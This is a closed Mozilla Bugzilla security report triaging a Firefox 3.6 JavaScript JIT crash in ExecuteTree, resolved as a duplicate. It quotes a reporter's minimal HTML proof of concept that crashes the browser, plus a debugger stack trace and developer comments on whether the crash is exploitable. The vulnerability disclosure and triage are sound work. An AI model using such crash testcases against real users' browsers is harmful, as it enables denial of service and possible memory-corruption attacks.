Closed Bug 651221 Opened 10 years ago Closed 10 years ago

Investigate crash [@ ExecuteTree ]

Categories

(Core :: JavaScript Engine, defect)

1.9.2 Branch
defect
Not set
normal

Tracking

()

VERIFIED DUPLICATE of bug 650874

People

(Reporter: bsterne, Unassigned)

Details

(Whiteboard: [sg:dupe 650874])

Attachments

(1 file)

Donato Ferrante reported this to security@m.o today.  The testcase crashed Firefox 3.6.16 for me on OS X, but not trunk:
bp-3694baee-d78b-49e3-9d0a-961f62110419

The rest of Donato's email follows:

-----

Hi,

I have just found a vulnerability in Firefox while it handles a
specially crafted javascript.

-----------------
Affected Software
-----------------
	+ Firefox 3.6.x ( tested on 3.6.16 and 3.6.17 )
	- Firefox 4, seems to be non vulnerable to this issue

----------------
Proof Of Concept
----------------
This is the minimal PoC to reproduce the issue:

<html>
	<script>
		var Fun=eval("eval");             // required
		for(u=0; u <3; u++){ Fun(); }     // required - it MUST be >= 3
		alert("Not bug :(");              // extra - can be removed
	</script>
</html>

(9a4.49c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=053ac880 ebx=03dd5800 ecx=00000007 edx=004dc778 esi=00000000 edi=004dc4f0
02d9fee0 esp=004dc4b0 ebp=004dc4e8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
02d9fee0 8b0504000000    mov     eax,dword ptr ds:[4] ds:0023:00000004=????????

0:000> k
ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
004dc4e8 69d8ab51 0x2d9fee0
004de8b8 69d8b2d4 js3250!ExecuteTree+0x3c1
[e:\builds\moz2_slave\rel-192-w32-bld\build\js\src\jstracer.cpp @
6283]
004de930 69d99a5f js3250!js_MonitorLoopEdge+0x3e4
[e:\builds\moz2_slave\rel-192-w32-bld\build\js\src\jstracer.cpp @
6749]
004deb4c 69db48e5 js3250!js_Interpret+0x88f
[e:\builds\moz2_slave\rel-192-w32-bld\build\js\src\jsops.cpp @ 912]
004debd0 69dc7011 js3250!js_Execute+0x1a5
[e:\builds\moz2_slave\rel-192-w32-bld\build\js\src\jsinterp.cpp @
1601]
004debf8 5c8be432 js3250!JS_EvaluateUCScriptForPrincipals+0x61
[e:\builds\moz2_slave\rel-192-w32-bld\build\js\src\jsapi.cpp @ 5058]
004dec78 5c8c2c8d xul!gfxTextRun::GlyphRunIterator::NextRun+0x7282
004ded30 5c93579c xul!gfxTextRun::GlyphRunIterator::NextRun+0xbadd
004ded74 5c8c8374 xul!gfxSkipCharsIterator::gfxSkipCharsIterator+0x107d
004ded8c 5c838cbc xul!gfxWindowsFontGroup::MakeTextRun+0xe3
004deda8 6ba490c9 xul!NS_CycleCollectorSuspect2_P+0xebc
004dedc0 6ba49a1d MOZCRT19!expand+0x13c9
004dedcc 5c836503 MOZCRT19!malloc+0x3d
00000000 00000000 xul!gfxWindowsFontGroup::InitTextRunUniscribe+0x232
The stack I got does look pretty bad:
bp-3694baee-d78b-49e3-9d0a-961f62110419

Appears we may be calling random memory there.  We have a couple of closed bugs that have this same signature, but one doesn't have a testcase and the other's testcase looks quite different.
Is this the same as bug 650874?
(In reply to comment #1)
> The stack I got does look pretty bad:
> bp-3694baee-d78b-49e3-9d0a-961f62110419
> 
> Appears we may be calling random memory there.

No, ExecuteTree calls JITted code so the unknown address is expected there. It looks like a null deref to me, except with the caveat that I don't know if you can mislead the JIT into using some other non-null value there.

(In reply to comment #2)
> Is this the same as bug 650874?

Looks like it to me. The essential features of this and the minimized testcase there are the same.
Status: NEW → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE
Whiteboard: [sg:critical?] → [sg:dupe 650874]
Duplicate of bug: 650874
Status: RESOLVED → VERIFIED
Group: core-security
You need to log in before you can comment on or make changes to this bug.